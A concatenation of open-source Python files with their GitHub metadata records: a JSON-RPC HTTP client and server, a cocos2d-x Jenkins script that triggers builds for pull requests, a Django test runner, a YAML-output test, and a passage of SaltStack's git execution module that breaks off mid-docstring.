else:
response_string = response.read()
response.close()
return response_string
class HttpClient(object):
class _Method(object):
def __init__(self, http_client_instance, method):
self.http_client_instance = http_client_instance
self.method = method
def __call__(self, *args, **kwargs):
return self.http_client_instance.call(self.method, *args, **kwargs)
def __init__(
self,
url,
username = None,
password = None
):
"""
:param url: URL of the JSON-RPC handler on the HTTP server.
Example: ``"https://example.com/jsonrpc"``
:param username: If *username* is given, HTTP Basic authentication will be used.
:param password: Password for HTTP Basic authentication.
"""
self.url = url
self.username = username
self.password = password
def call(self, method, *args, **kwargs):
"""
Creates the JSON-RPC request string, calls the HTTP server, converts
JSON-RPC response string to python and returns the result.
:param method: Name of the method which will be called on the HTTP server.
Or a list with RPC-Request-Dictionaries. Syntax::
"<MethodName>" or [<JsonRpcRequestDict>, ...]
RPC-Request-Dictionaries will be made with the function
*rpcrequest.create_request_dict()*.
"""
# Create JSON-RPC-request
if isinstance(method, basestring):
request_json = rpcrequest.create_request_json(method, *args, **kwargs)
else:
request_json = json.dumps(method)
assert not args and not kwargs
# Call the HTTP-JSON-RPC server
response_json = http_request(
url = self.url,
json_string = request_json,
username = self.username,
password = self.password
)
# Convert JSON-RPC-response to python-object
response = rpcresponse.parse_response_json(response_json)
if response.error:
# Raise error
raise rpcerror.jsonrpcerrors[response.error.code](
message = response.error.message,
data = response.error.data
)
else:
# Return result
return response.result
def __call__(self, method, *args, **kwargs):
"""
Redirects the direct call to *self.call*
"""
return self.call(method, *args, **kwargs)
def __getattr__(self, method):
"""
Allows the usage of attributes as *method* names.
"""
return self._Method(http_client_instance = self, method = method)
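# A minimal client sketch (hypothetical endpoint and remote method name):
#
#     client = HttpClient("https://example.com/jsonrpc",
#                         username="user", password="secret")
#     result = client.add(1, 2)     # resolved via __getattr__ -> call("add", 1, 2)
#     result = client("add", 1, 2)  # equivalent, via __call__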
class ThreadingHttpServer(SocketServer.ThreadingMixIn, BaseHTTPServer.HTTPServer):
"""
Threading HTTP Server
"""
pass
class HttpRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler, rpclib.JsonRpc):
"""
HttpRequestHandler for JSON-RPC-Requests
Info: http://www.simple-is-better.org/json-rpc/transport_http.html
"""
protocol_version = "HTTP/1.1"
#server_version = "BaseHTTP/" + __version__
def set_content_type_json(self):
"""
Set content-type to "application/json"
"""
self.send_header("Content-Type", "application/json")
def set_no_cache(self):
"""
Disable caching
"""
self.send_header("Cache-Control", "no-cache")
self.send_header("Pragma", "no-cache")
def set_content_length(self, length):
"""
Set content-length-header
"""
self.send_header("Content-Length", str(length))
def do_GET(self):
"""
Handles HTTP-GET-Request
"""
# Parse URL query
query = urlparse.parse_qs(urllib.splitquery(self.path)[1])
# jsonrpc
jsonrpc = query.get("jsonrpc")
if jsonrpc:
jsonrpc = jsonrpc[0]
# id
id = query.get("id")
if id:
id = id[0]
# method
method = query.get("method")
if method:
method = method[0]
# params
args = []
kwargs = {}
params = query.get("params")
if params:
params = json.loads(params[0])
if isinstance(params, list):
args = params
kwargs = {}
elif isinstance(params, dict):
args = []
kwargs = params
# Create JSON request string
request_dict = rpcrequest.create_request_dict(method, *args, **kwargs)
request_dict["jsonrpc"] = jsonrpc
request_dict["id"] = id
request_json = json.dumps(request_dict)
# Call
response_json = self.call(request_json)
# Return result
self.send_response(code = httplib.OK)
self.set_content_type_json()
self.set_no_cache()
self.set_content_length(len(response_json))
self.end_headers()
self.wfile.write(response_json)
def do_POST(self):
"""
Handles HTTP-POST-Request
"""
# Read JSON request
content_length = int(self.headers.get("Content-Length", 0))
request_json = self.rfile.read(content_length)
# Call
response_json = self.call(request_json)
# Return result
self.send_response(code = httplib.OK)
self.set_content_type_json()
self.set_no_cache()
self.set_content_length(len(response_json))
self.end_headers()
self.wfile.write(response_json)
return
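# A minimal server sketch (assumes RPC methods are registered the way
# rpclib.JsonRpc expects them on the handler; details of that registration
# are outside this file):
#
#     server = ThreadingHttpServer(("localhost", 8080), HttpRequestHandler)
#     server.serve_forever()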
def handle_cgi_request(methods = None):
"""
Gets the JSON-RPC request from CGI environment and returns the
result to STDOUT
"""
import cgi
import cgitb
cgitb.enable()
# get response-body
request_json = sys.stdin.read()
if request_json:
# POST
request_json = urlparse.unquote(request_json)
else:
# GET
args = []
kwargs = {}
fields = cgi.FieldStorage()
jsonrpc = fields.getfirst("jsonrpc")
id = fields.getfirst("id")
method = fields.getfirst("method")
params = fields.getfirst("params")
if params:
params = json.loads(params)
if isinstance(params, list):
args = params
kwargs = {}
elif isinstance(params, dict):
args = []
kwargs = params
# Create JSON request string
request_dict = rpcrequest.create_request_dict(method, *args, **kwargs)
request_dict["jsonrpc"] = jsonrpc
request_dict["id"] = id
request_json = json.dumps(request_dict)
# Call
response_json = rpclib.JsonRpc(methods = methods).call(request_json)
# Return headers
print "Content-Type: application/json"
print "Cache-Control: no-cache"
print "Pragma: no-cache"
print
# Return result
print response_json
|
{
"content_hash": "390a90be25b5287158daf1d5f1b12674",
"timestamp": "",
"source": "github",
"line_count": 308,
"max_line_length": 82,
"avg_line_length": 26.5487012987013,
"alnum_prop": 0.581264522440993,
"repo_name": "moritz-wundke/Concurrent",
"id": "8041fb3ea71939a6f22cebb9372f83f790bef1c6",
"size": "8216",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "concurrent/core/transport/pyjsonrpc/http.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "93243"
},
{
"name": "Python",
"bytes": "511887"
},
{
"name": "Shell",
"bytes": "7035"
}
],
"symlink_target": ""
}
|
import os
import requests
import datetime
import re
import json
import sys
import traceback
url = 'https://api.github.com/repos/cocos2d/cocos2d-x/pulls?state=open&sort=created&direction=desc'
job_trigger_url=os.environ['JOB_PULL_REQUEST_BUILD_TRIGGER_URL']
access_token = os.environ['GITHUB_ACCESS_TOKEN']
Headers = {"Authorization":"token " + access_token}
def main():
r = requests.get(url,headers=Headers)
payload = r.json()
print payload
for pr in payload:
pr_num = pr['number']
r = requests.get(pr['url']+"/commits",headers=Headers)
commits = r.json()
#print commits
last_commit = commits[len(commits)-1]
message = last_commit['commit']['message']
#print message
pattern = re.compile("\[ci(\s+)skip\]", re.I)
result_commit_title = pattern.search(message)
title = pr['title']
result_pr_title = pattern.search(title)
if result_commit_title is not None or result_pr_title is not None:
print 'skip build for pull request #' + str(pr_num)
# skip only this pull request and keep checking the rest
# (a 'break' here would have stopped processing all remaining PRs)
continue
s = pr['statuses_url']
update_time = pr['updated_at']
print pr_num
print s
print update_time
t = datetime.datetime.strptime(update_time, "%Y-%m-%dT%H:%M:%SZ")
now = datetime.datetime.utcnow()
three_minutes = datetime.timedelta(seconds=3*60)
if (t + three_minutes < now):
#print pr_num
statuses = requests.get(s, headers=Headers)
#print statuses.json()
if len(statuses.json()) < 1:
print pr_num
payload_forward = {}
payload_forward['number']=pr_num
payload_forward['action']=pr['state']
payload_forward['html_url']=pr['html_url']
payload_forward['statuses_url']=pr['statuses_url']
payload_forward['branch']=pr['base']['ref']
print payload_forward
post_data = {'payload':""}
post_data['payload']= json.dumps(payload_forward)
requests.post(job_trigger_url, data=post_data)
# -------------- main --------------
if __name__ == '__main__':
sys_ret = 0
try:
main()
except:
traceback.print_exc()
sys_ret = 1
finally:
sys.exit(sys_ret)
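# Note: this watchdog expects two environment variables to be set before it
# runs (read at the top of the file): JOB_PULL_REQUEST_BUILD_TRIGGER_URL and
# GITHUB_ACCESS_TOKEN.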
|
{
"content_hash": "20c32c4e9ca40d4dc36d065113296b90",
"timestamp": "",
"source": "github",
"line_count": 71,
"max_line_length": 99,
"avg_line_length": 29.183098591549296,
"alnum_prop": 0.6443050193050193,
"repo_name": "dios-game/dios-cocos",
"id": "cb8b301850031dd50fc59635ab2a9c5162b13428",
"size": "2158",
"binary": false,
"copies": "7",
"ref": "refs/heads/master",
"path": "src/oslibs/cocos/cocos-src/tools/jenkins-scripts/master-scripts/github-pr-watchdog.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "125794"
},
{
"name": "C",
"bytes": "3815020"
},
{
"name": "C++",
"bytes": "38139132"
},
{
"name": "CMake",
"bytes": "405048"
},
{
"name": "GLSL",
"bytes": "90557"
},
{
"name": "HTML",
"bytes": "15373"
},
{
"name": "Java",
"bytes": "2406393"
},
{
"name": "JavaScript",
"bytes": "11539881"
},
{
"name": "Lua",
"bytes": "6979760"
},
{
"name": "Makefile",
"bytes": "101523"
},
{
"name": "Objective-C",
"bytes": "1983529"
},
{
"name": "Objective-C++",
"bytes": "759608"
},
{
"name": "Python",
"bytes": "1025018"
},
{
"name": "Shell",
"bytes": "116857"
}
],
"symlink_target": ""
}
|
import os
import sys
import django
from django.conf import settings
from django.test.utils import get_runner
def run_test():
TestRunner = get_runner(settings)
test_runner = TestRunner()
failures = test_runner.run_tests(["lbworkflow"])
sys.exit(bool(failures))
if __name__ == "__main__":
os.environ["DJANGO_SETTINGS_MODULE"] = "lbworkflow.tests.settings"
django.setup()
from django.core.management import call_command
if (len(sys.argv)) == 2:
call_command(sys.argv[1])
sys.exit(0)
run_test()
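# Usage sketch (from the repository root; any management command name can be
# forwarded, 'makemigrations' is just an example):
#
#     python runtests.py                  # run the lbworkflow test suite
#     python runtests.py makemigrations   # forward a single management command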
|
{
"content_hash": "92e3014201ef8548889de78977e7ee65",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 70,
"avg_line_length": 22.875,
"alnum_prop": 0.663023679417122,
"repo_name": "vicalloy/django-lb-workflow",
"id": "ef9cdd55fadc733d540091323f2cfcf3c0457dd8",
"size": "571",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "runtests.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "39"
},
{
"name": "Dockerfile",
"bytes": "452"
},
{
"name": "HTML",
"bytes": "32992"
},
{
"name": "JavaScript",
"bytes": "18"
},
{
"name": "Makefile",
"bytes": "1081"
},
{
"name": "Python",
"bytes": "194839"
}
],
"symlink_target": ""
}
|
import os
from tests.test_util import build_ts_session, build_ts_specimen_session
from yodatools.converter.Outputs.yamlOutput import yamlOutput
curr_folder = os.path.abspath(os.path.dirname(os.path.dirname(os.path.dirname(__file__))))
# curr_folder = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))
# file_path = os.path.join(curr_folder, 'test_files', 'YODA_TimeSeriesSpecimen_RB_2014-15_pub.xlsx')
class TestYaml:
def setup(self):
self.yo = yamlOutput()
def test_create_ts(self):
session = build_ts_session()
file_path = os.path.join(curr_folder, 'test_files', 'test_ts_output.yaml')
self.yo.save(session, file_path)
def test_create_specimen(self):
session = build_ts_specimen_session()
file_path = os.path.join(curr_folder, 'test_files', 'test_ts_specimen_output.yaml')
self.yo.save(session, file_path)
|
{
"content_hash": "c0bd0651b04034967a43ded2604b37bd",
"timestamp": "",
"source": "github",
"line_count": 22,
"max_line_length": 105,
"avg_line_length": 41.13636363636363,
"alnum_prop": 0.687292817679558,
"repo_name": "ODM2/YODA-Tools",
"id": "5920eada9d86f10158ac2aa9004a0d880d471732",
"size": "905",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/test_converter/test_output/test_yamlOutput.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "287065"
}
],
"symlink_target": ""
}
|
'''
Support for the Git SCM
'''
from __future__ import absolute_import
# Import python libs
import copy
import logging
import os
import re
from distutils.version import LooseVersion as _LooseVersion
# Import salt libs
import salt.utils
import salt.utils.files
import salt.utils.itertools
import salt.utils.templates
import salt.utils.url
from salt.exceptions import SaltInvocationError, CommandExecutionError
from salt.ext import six
log = logging.getLogger(__name__)
__func_alias__ = {
'rm_': 'rm'
}
def __virtual__():
'''
Only load if git exists on the system
'''
if salt.utils.which('git') is None:
return (False,
'The git execution module cannot be loaded: git unavailable.')
else:
return True
def _check_worktree_support(failhard=True):
'''
Ensure that we don't try to operate on worktrees in git < 2.5.0.
'''
git_version = version(versioninfo=False)
if _LooseVersion(git_version) < _LooseVersion('2.5.0'):
if failhard:
raise CommandExecutionError(
'Worktrees are only supported in git 2.5.0 and newer '
'(detected git version: ' + git_version + ')'
)
return False
return True
def _config_getter(get_opt,
key,
value_regex=None,
cwd=None,
user=None,
ignore_retcode=False,
**kwargs):
'''
Common code for config.get_* functions, builds and runs the git CLI command
and returns the result dict for the calling function to parse.
'''
kwargs = salt.utils.clean_kwargs(**kwargs)
global_ = kwargs.pop('global', False)
if kwargs:
salt.utils.invalid_kwargs(kwargs)
if cwd is None:
if not global_:
raise SaltInvocationError(
'\'cwd\' argument required unless global=True'
)
else:
cwd = _expand_path(cwd, user)
if get_opt == '--get-regexp':
if value_regex is not None \
and not isinstance(value_regex, six.string_types):
value_regex = str(value_regex)
else:
# Ignore value_regex
value_regex = None
command = ['git', 'config']
command.extend(_which_git_config(global_, cwd, user))
command.append(get_opt)
command.append(key)
if value_regex is not None:
command.append(value_regex)
return _git_run(command,
cwd=cwd,
runas=user,
ignore_retcode=ignore_retcode,
failhard=False)
def _expand_path(cwd, user):
'''
Expand home directory
'''
try:
to_expand = '~' + user if user else '~'
except TypeError:
# Users should never be numeric but if we don't account for this then
# we're going to get a traceback if someone passes this invalid input.
to_expand = '~' + str(user) if user else '~'
try:
return os.path.join(os.path.expanduser(to_expand), cwd)
except AttributeError:
return os.path.join(os.path.expanduser(to_expand), str(cwd))
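# Illustrative behavior (assuming a conventional /home layout):
#     _expand_path('repo', 'jeff')  ->  '/home/jeff/repo'
#     _expand_path('repo', None)    ->  '~/repo' expanded for the current user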
def _format_opts(opts):
'''
Common code to inspect opts and split them if necessary
'''
if opts is None:
return []
elif isinstance(opts, list):
new_opts = []
for item in opts:
if isinstance(item, six.string_types):
new_opts.append(item)
else:
new_opts.append(str(item))
return new_opts
else:
if not isinstance(opts, six.string_types):
opts = [str(opts)]
else:
opts = salt.utils.shlex_split(opts)
try:
if opts[-1] == '--':
# Strip the '--' if it was passed at the end of the opts string,
# it'll be added back (if necessary) in the calling function.
# Putting this check here keeps it from having to be repeated every
# time _format_opts() is invoked.
return opts[:-1]
except IndexError:
pass
return opts
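# Illustrative behavior:
#     _format_opts(None)            ->  []
#     _format_opts('--depth 1 --')  ->  ['--depth', '1']  (trailing '--' stripped)
#     _format_opts(['-v', 1])       ->  ['-v', '1']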
def _git_run(command, cwd=None, runas=None, identity=None,
ignore_retcode=False, failhard=True, redirect_stderr=False,
saltenv='base', **kwargs):
'''
Simple wrapper that throws an exception with the error message on a
nonzero return code. This function may be moved to the command module,
spliced with 'cmd.run_all', and used as an alternative to it. Some
commands don't return proper retcodes, so this can't replace 'cmd.run_all'.
'''
env = {}
if identity:
_salt_cli = __opts__.get('__cli', '')
errors = []
missing_keys = []
# if the statefile provides multiple identities, they need to be tried
# (but also allow a string instead of a list)
if not isinstance(identity, list):
# force it into a list
identity = [identity]
# try each of the identities, independently
for id_file in identity:
if 'salt://' in id_file:
_id_file = id_file
id_file = __salt__['cp.cache_file'](id_file, saltenv)
if not id_file:
log.error('identity {0} does not exist.'.format(_id_file))
continue
else:
if not __salt__['file.file_exists'](id_file):
missing_keys.append(id_file)
log.error('identity {0} does not exist.'.format(id_file))
continue
env = {
'GIT_IDENTITY': id_file
}
# copy wrapper to area accessible by ``runas`` user
# currently no support on Windows for wrapping git ssh
ssh_id_wrapper = os.path.join(
salt.utils.templates.TEMPLATE_DIRNAME,
'git/ssh-id-wrapper'
)
if salt.utils.is_windows():
for suffix in ('', ' (x86)'):
ssh_exe = (
'C:\\Program Files{0}\\Git\\bin\\ssh.exe'
.format(suffix)
)
if os.path.isfile(ssh_exe):
env['GIT_SSH_EXE'] = ssh_exe
break
else:
raise CommandExecutionError(
'Failed to find ssh.exe, unable to use identity file'
)
# Use the windows batch file instead of the bourne shell script
ssh_id_wrapper += '.bat'
env['GIT_SSH'] = ssh_id_wrapper
else:
tmp_file = salt.utils.mkstemp()
salt.utils.files.copyfile(ssh_id_wrapper, tmp_file)
os.chmod(tmp_file, 0o500)
os.chown(tmp_file, __salt__['file.user_to_uid'](runas), -1)
env['GIT_SSH'] = tmp_file
if 'salt-call' not in _salt_cli \
and __salt__['ssh.key_is_encrypted'](id_file):
errors.append(
'Identity file {0} is passphrase-protected and cannot be '
'used in a non-interactive command. Using salt-call from '
'the minion will allow a passphrase-protected key to be '
'used.'.format(id_file)
)
continue
log.info(
'Attempting git authentication using identity file {0}'
.format(id_file)
)
try:
result = __salt__['cmd.run_all'](
command,
cwd=cwd,
runas=runas,
env=env,
python_shell=False,
log_callback=salt.utils.url.redact_http_basic_auth,
ignore_retcode=ignore_retcode,
redirect_stderr=redirect_stderr,
**kwargs)
finally:
if not salt.utils.is_windows() and 'GIT_SSH' in env:
os.remove(env['GIT_SSH'])
# If the command was successful, no need to try additional IDs
if result['retcode'] == 0:
return result
else:
err = result['stdout' if redirect_stderr else 'stderr']
if err:
errors.append(salt.utils.url.redact_http_basic_auth(err))
# We've tried all IDs and still haven't passed, so error out
if failhard:
msg = (
'Unable to authenticate using identity file:\n\n{0}'.format(
'\n'.join(errors)
)
)
if missing_keys:
if errors:
msg += '\n\n'
msg += (
'The following identity file(s) were not found: {0}'
.format(', '.join(missing_keys))
)
raise CommandExecutionError(msg)
return result
else:
result = __salt__['cmd.run_all'](
command,
cwd=cwd,
runas=runas,
env=env,
python_shell=False,
log_callback=salt.utils.url.redact_http_basic_auth,
ignore_retcode=ignore_retcode,
redirect_stderr=redirect_stderr,
**kwargs)
if result['retcode'] == 0:
return result
else:
if failhard:
gitcommand = ' '.join(command) \
if isinstance(command, list) \
else command
msg = 'Command \'{0}\' failed'.format(
salt.utils.url.redact_http_basic_auth(gitcommand)
)
err = result['stdout' if redirect_stderr else 'stderr']
if err:
msg += ': {0}'.format(
salt.utils.url.redact_http_basic_auth(err)
)
raise CommandExecutionError(msg)
return result
def _get_toplevel(path, user=None):
'''
Use git rev-parse to return the top level of a repo
'''
return _git_run(
['git', 'rev-parse', '--show-toplevel'],
cwd=path,
runas=user
)['stdout']
def _git_config(cwd, user):
'''
Helper to retrieve git config options
'''
contextkey = 'git.config.' + cwd
if contextkey not in __context__:
git_dir = rev_parse(cwd,
opts=['--git-dir'],
user=user,
ignore_retcode=True)
if not os.path.isabs(git_dir):
paths = (cwd, git_dir, 'config')
else:
paths = (git_dir, 'config')
__context__[contextkey] = os.path.join(*paths)
return __context__[contextkey]
def _which_git_config(global_, cwd, user):
'''
Based on whether global or local config is desired, return a list of CLI
args to include in the git config command.
'''
if global_:
return ['--global']
version_ = _LooseVersion(version(versioninfo=False))
if version_ >= _LooseVersion('1.7.10.2'):
# --local added in 1.7.10.2
return ['--local']
else:
# For earlier versions, need to specify the path to the git config file
return ['--file', _git_config(cwd, user)]
def add(cwd, filename, opts='', user=None, ignore_retcode=False):
'''
.. versionchanged:: 2015.8.0
The ``--verbose`` command line argument is now implied
Interface to `git-add(1)`_
cwd
The path to the git checkout
filename
The location of the file/directory to add, relative to ``cwd``
opts
Any additional options to add to the command line, in a single string
.. note::
On the Salt CLI, if the opts are preceded with a dash, it is
necessary to precede them with ``opts=`` (as in the CLI examples
below) to avoid causing errors with Salt's own argument parsing.
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
.. _`git-add(1)`: http://git-scm.com/docs/git-add
CLI Examples:
.. code-block:: bash
salt myminion git.add /path/to/repo foo/bar.py
salt myminion git.add /path/to/repo foo/bar.py opts='--dry-run'
'''
cwd = _expand_path(cwd, user)
if not isinstance(filename, six.string_types):
filename = str(filename)
command = ['git', 'add', '--verbose']
command.extend(
[x for x in _format_opts(opts) if x not in ('-v', '--verbose')]
)
command.extend(['--', filename])
return _git_run(command,
cwd=cwd,
runas=user,
ignore_retcode=ignore_retcode)['stdout']
def archive(cwd,
output,
rev='HEAD',
fmt=None,
prefix=None,
user=None,
ignore_retcode=False,
**kwargs):
'''
.. versionchanged:: 2015.8.0
Returns ``True`` if successful, raises an error if not.
Interface to `git-archive(1)`_, exports a tarball/zip file of the
repository
cwd
The path to be archived
.. note::
``git archive`` permits a partial archive to be created. Thus, this
path does not need to be the root of the git repository. Only the
files within the directory specified by ``cwd`` (and its
subdirectories) will be in the resulting archive. For example, if
there is a git checkout at ``/tmp/foo``, then passing
``/tmp/foo/bar`` as the ``cwd`` will result in just the files
underneath ``/tmp/foo/bar`` to be exported as an archive.
output
The path of the archive to be created
overwrite : False
Unless set to ``True``, Salt will not overwrite an existing archive at
the path specified by the ``output`` argument.
.. versionadded:: 2015.8.0
rev : HEAD
The revision from which to create the archive
format
Manually specify the file format of the resulting archive. This
argument can be omitted, and ``git archive`` will attempt to guess the
archive type (and compression) from the filename. ``zip``, ``tar``,
``tar.gz``, and ``tgz`` are extensions that are recognized
automatically, and git can be configured to support other archive types
with the addition of git configuration keys.
See the `git-archive(1)`_ manpage explanation of the
``--format`` argument (as well as the ``CONFIGURATION`` section of the
manpage) for further information.
.. versionadded:: 2015.8.0
fmt
Replaced by ``format`` in version 2015.8.0
.. deprecated:: 2015.8.0
prefix
Prepend ``<prefix>`` to every filename in the archive. If unspecified,
the name of the directory at the top level of the repository will be
used as the prefix (e.g. if ``cwd`` is set to ``/foo/bar/baz``, the
prefix will be ``baz``, and the resulting archive will contain a
top-level directory by that name).
.. note::
The default behavior if the ``--prefix`` option for ``git archive``
is not specified is to not prepend a prefix, so Salt's behavior
differs slightly from ``git archive`` in this respect. Use
``prefix=''`` to create an archive with no prefix.
.. versionchanged:: 2015.8.0
The behavior of this argument has been changed slightly. As of
this version, it is necessary to include the trailing slash when
specifying a prefix, if the prefix is intended to create a
top-level directory.
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
.. _`git-archive(1)`: http://git-scm.com/docs/git-archive
CLI Example:
.. code-block:: bash
salt myminion git.archive /path/to/repo /path/to/archive.tar
'''
cwd = _expand_path(cwd, user)
output = _expand_path(output, user)
# Sanitize kwargs and make sure that no invalid ones were passed. This
# allows us to accept 'format' as an argument to this function without
# shadowing the format() global, while also not allowing unwanted arguments
# to be passed.
kwargs = salt.utils.clean_kwargs(**kwargs)
format_ = kwargs.pop('format', None)
if kwargs:
salt.utils.invalid_kwargs(kwargs)
if fmt:
salt.utils.warn_until(
'Nitrogen',
'The \'fmt\' argument to git.archive has been deprecated, please '
'use \'format\' instead.'
)
format_ = fmt
command = ['git', 'archive']
# If prefix was set to '' then we skip adding the --prefix option
if prefix != '':
if prefix:
if not isinstance(prefix, six.string_types):
prefix = str(prefix)
else:
prefix = os.path.basename(cwd) + '/'
command.extend(['--prefix', prefix])
if format_:
if not isinstance(format_, six.string_types):
format_ = str(format_)
command.extend(['--format', format_])
command.extend(['--output', output, rev])
_git_run(command, cwd=cwd, runas=user, ignore_retcode=ignore_retcode)
# No output (unless --verbose is used, and we don't want all files listed
# in the output in case there are thousands), so just return True
return True
def branch(cwd, name=None, opts='', user=None, ignore_retcode=False):
'''
Interface to `git-branch(1)`_
cwd
The path to the git checkout
name
Name of the branch on which to operate. If not specified, the current
branch will be assumed.
opts
Any additional options to add to the command line, in a single string
.. note::
To create a branch based on something other than HEAD, pass the
name of the revision as ``opts``. If the revision is in the format
``remotename/branch``, then this will also set the remote tracking
branch.
Additionally, on the Salt CLI, if the opts are preceded with a
dash, it is necessary to precede them with ``opts=`` (as in the CLI
examples below) to avoid causing errors with Salt's own argument
parsing.
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
.. _`git-branch(1)`: http://git-scm.com/docs/git-branch
CLI Examples:
.. code-block:: bash
# Set remote tracking branch
salt myminion git.branch /path/to/repo mybranch opts='--set-upstream-to origin/mybranch'
# Create new branch
salt myminion git.branch /path/to/repo mybranch upstream/somebranch
# Delete branch
salt myminion git.branch /path/to/repo mybranch opts='-d'
# Rename branch (2015.8.0 and later)
salt myminion git.branch /path/to/repo newbranch opts='-m oldbranch'
'''
cwd = _expand_path(cwd, user)
command = ['git', 'branch']
command.extend(_format_opts(opts))
if name is not None:
command.append(name)
_git_run(command, cwd=cwd, runas=user, ignore_retcode=ignore_retcode)
return True
def checkout(cwd,
rev=None,
force=False,
opts='',
user=None,
ignore_retcode=False):
'''
Interface to `git-checkout(1)`_
cwd
The path to the git checkout
opts
Any additional options to add to the command line, in a single string
.. note::
On the Salt CLI, if the opts are preceded with a dash, it is
necessary to precede them with ``opts=`` (as in the CLI examples
below) to avoid causing errors with Salt's own argument parsing.
rev
The remote branch or revision to checkout.
.. versionchanged:: 2015.8.0
Optional when using ``-b`` or ``-B`` in ``opts``.
force : False
Force a checkout even if there might be overwritten changes
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
.. _`git-checkout(1)`: http://git-scm.com/docs/git-checkout
CLI Examples:
.. code-block:: bash
# Checking out local revisions
salt myminion git.checkout /path/to/repo somebranch user=jeff
salt myminion git.checkout /path/to/repo opts='testbranch -- conf/file1 file2'
salt myminion git.checkout /path/to/repo rev=origin/mybranch opts='--track'
# Checking out remote revision into new branch
salt myminion git.checkout /path/to/repo upstream/master opts='-b newbranch'
# Checking out current revision into new branch (2015.8.0 and later)
salt myminion git.checkout /path/to/repo opts='-b newbranch'
'''
cwd = _expand_path(cwd, user)
command = ['git', 'checkout']
if force:
command.append('--force')
opts = _format_opts(opts)
command.extend(opts)
checkout_branch = any(x in opts for x in ('-b', '-B'))
if rev is None:
if not checkout_branch:
raise SaltInvocationError(
'\'rev\' argument is required unless -b or -B in opts'
)
else:
if not isinstance(rev, six.string_types):
rev = str(rev)
command.append(rev)
# Checkout message goes to stderr
return _git_run(command,
cwd=cwd,
runas=user,
ignore_retcode=ignore_retcode,
redirect_stderr=True)['stdout']
def clone(cwd,
url=None, # Remove default value once 'repository' arg is removed
name=None,
opts='',
user=None,
identity=None,
https_user=None,
https_pass=None,
ignore_retcode=False,
repository=None,
saltenv='base'):
'''
Interface to `git-clone(1)`_
cwd
Location of git clone
.. versionchanged:: 2015.8.0
If ``name`` is passed, then the clone will be made *within* this
directory.
url
The URL of the repository to be cloned
.. versionchanged:: 2015.8.0
Argument renamed from ``repository`` to ``url``
name
Optional alternate name for the top-level directory to be created by
the clone
.. versionadded:: 2015.8.0
opts
Any additional options to add to the command line, in a single string
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
identity
Path to a private key to use for ssh URLs
.. warning::
Unless Salt is invoked from the minion using ``salt-call``, the
key(s) must be passphraseless. For greater security with
passphraseless private keys, see the `sshd(8)`_ manpage for
information on securing the keypair from the remote side in the
``authorized_keys`` file.
.. _`sshd(8)`: http://www.man7.org/linux/man-pages/man8/sshd.8.html#AUTHORIZED_KEYS_FILE%20FORMAT
.. versionchanged:: 2015.8.7
Salt will no longer attempt to use passphrase-protected keys unless
invoked from the minion using ``salt-call``, to prevent blocking
waiting for user input.
The key can also be specified as a SaltStack fileserver URL, e.g. ``salt://location/identity_file``
.. versionchanged:: 2016.3.0
https_user
Set HTTP Basic Auth username. Only accepted for HTTPS URLs.
.. versionadded:: 2015.5.0
https_pass
Set HTTP Basic Auth password. Only accepted for HTTPS URLs.
.. versionadded:: 2015.5.0
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
saltenv
The default salt environment to pull sls files from
.. versionadded:: 2016.3.1
.. _`git-clone(1)`: http://git-scm.com/docs/git-clone
CLI Example:
.. code-block:: bash
salt myminion git.clone /path/to/repo_parent_dir git://github.com/saltstack/salt.git
'''
cwd = _expand_path(cwd, user)
if repository is not None:
salt.utils.warn_until(
'Nitrogen',
'The \'repository\' argument to git.clone has been '
'deprecated, please use \'url\' instead.'
)
url = repository
if not url:
raise SaltInvocationError('Missing \'url\' argument')
try:
url = salt.utils.url.add_http_basic_auth(url,
https_user,
https_pass,
https_only=True)
except ValueError as exc:
raise SaltInvocationError(exc.__str__())
command = ['git', 'clone']
command.extend(_format_opts(opts))
command.extend(['--', url])
if name is not None:
if not isinstance(name, six.string_types):
name = str(name)
command.append(name)
if not os.path.exists(cwd):
os.makedirs(cwd)
clone_cwd = cwd
else:
command.append(cwd)
# Use '/tmp' instead of $HOME (/root for root user) to work around
# upstream git bug. See the following comment on the Salt bug tracker
# for more info:
# https://github.com/saltstack/salt/issues/15519#issuecomment-128531310
# On Windows, just fall back to None (runs git clone command using the
# home directory as the cwd).
clone_cwd = '/tmp' if not salt.utils.is_windows() else None
_git_run(command,
cwd=clone_cwd,
runas=user,
identity=identity,
ignore_retcode=ignore_retcode,
saltenv=saltenv)
return True
def commit(cwd,
message,
opts='',
user=None,
filename=None,
ignore_retcode=False):
'''
Interface to `git-commit(1)`_
cwd
The path to the git checkout
message
Commit message
opts
Any additional options to add to the command line, in a single string
.. note::
On the Salt CLI, if the opts are preceded with a dash, it is
necessary to precede them with ``opts=`` (as in the CLI examples
below) to avoid causing errors with Salt's own argument parsing.
The ``-m`` option should not be passed here, as the commit message
will be defined by the ``message`` argument.
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
filename
The location of the file/directory to commit, relative to ``cwd``.
This argument is optional, and can be used to commit a file without
first staging it.
.. note::
This argument only works on files which are already tracked by the
git repository.
.. versionadded:: 2015.8.0
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
